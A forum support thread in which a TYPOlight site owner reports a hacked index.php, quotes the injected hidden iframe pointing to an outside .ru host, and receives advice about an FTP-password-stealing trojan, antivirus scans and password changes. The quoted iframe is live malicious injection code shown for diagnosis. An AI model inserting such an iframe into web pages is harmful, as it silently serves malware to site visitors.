Results 1 to 6 of 6

Thread: problem with a hack of my TL website

  1. #1

    Default problem with a hack of my TL website

    Hello there,
    i used TL for 2 websites, and i had the same pb on both. one was with last version and the other is 2.7.1

    i had blank page (i wasn't modifying or uploading files) , so i checked the source code and saw a few html lines like this :

    Code:
    <div style="display:none">qyzwbuhudmcueanzyzepqgmhqzdljzo<iframe width=364 height=882 src="http://check-your-iq.ru:8080/index.php" ></iframe></div>
    i checked index.php of TL, and this line was at the end of the file.

    do you know if there is a problem with TL security, or do you knwo this kind of hack and how to counter it ? (i asked to change the ftp and mysql password)

    thanks !

  2. #2
    User
    Join Date
    06-19-09.
    Location
    Elbl?g, Poland
    Posts
    152

    Default Re: problem with a hack of my TL website

    Maybe I'm wrong but some time ago there was a virus which stole ftp passwords from TotalCommander and FilleZilla and next he connected to servers and added to index.php one line of code. What ftp client you use?
    Marcin

    http://www.contao.pl - Polish Support Site
    http://forum.contao.pl - Polish Contao community forum


    -----------------------
    Need custom template? Feel free to contact me by e-mail marcin@contao.pl

  3. #3

    Default Re: problem with a hack of my TL website

    i'm using filezilla atm, my antivir (kaspersky) detect nothing i hope it's gone.

  4. #4
    Core developer
    Official Contao Team
    leo's Avatar
    Join Date
    06-04-09.
    Location
    Wuppertal, Germany
    Posts
    201

    Default Re: problem with a hack of my TL website

    A couple of FileZilla hacks have been reported in the german forum, too. Use WinSCP if you can, it is the best open source FTP client on the market. And make sure to change ALL passwords if you have been hacked!

  5. #5
    Experienced user
    Join Date
    06-20-09.
    Posts
    1,311

    Default Re: problem with a hack of my TL website

    i'm using filezilla atm, my antivir (kaspersky) detect nothing i hope it's gone
    It won't be. :cry:
    This thing is evil if turns out to be the one qrczak is talking about. It'll be all through your sites, and probably all other sites of anyone on your shared host (if you use shared hosting).

    Download and run Avast antivirus http://www.avast.com/eng/download-avast-home.html, it should find a rootkit.
    I'd also ftp transfer all your site files onto your computer, so Avast can run through the lot and tell you which ones are infected.This will help you figure out how to get rid of it.
    Let us know what you find.

  6. #6

    Default Re: problem with a hack of my TL website

    hi there,
    i managed to clear my computer and websites infected.
    it was a gumblar/martuz like virus, like you said, i maybe had a trojan which grabbed my ftp passowrds and then modified my index, default... pages.
    i did a online virus scan with trend micros, i corrected my corrupted files (searching the <iframe> tag is nice ) and then change the ftp password and everything is ok now

    thanks for help.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •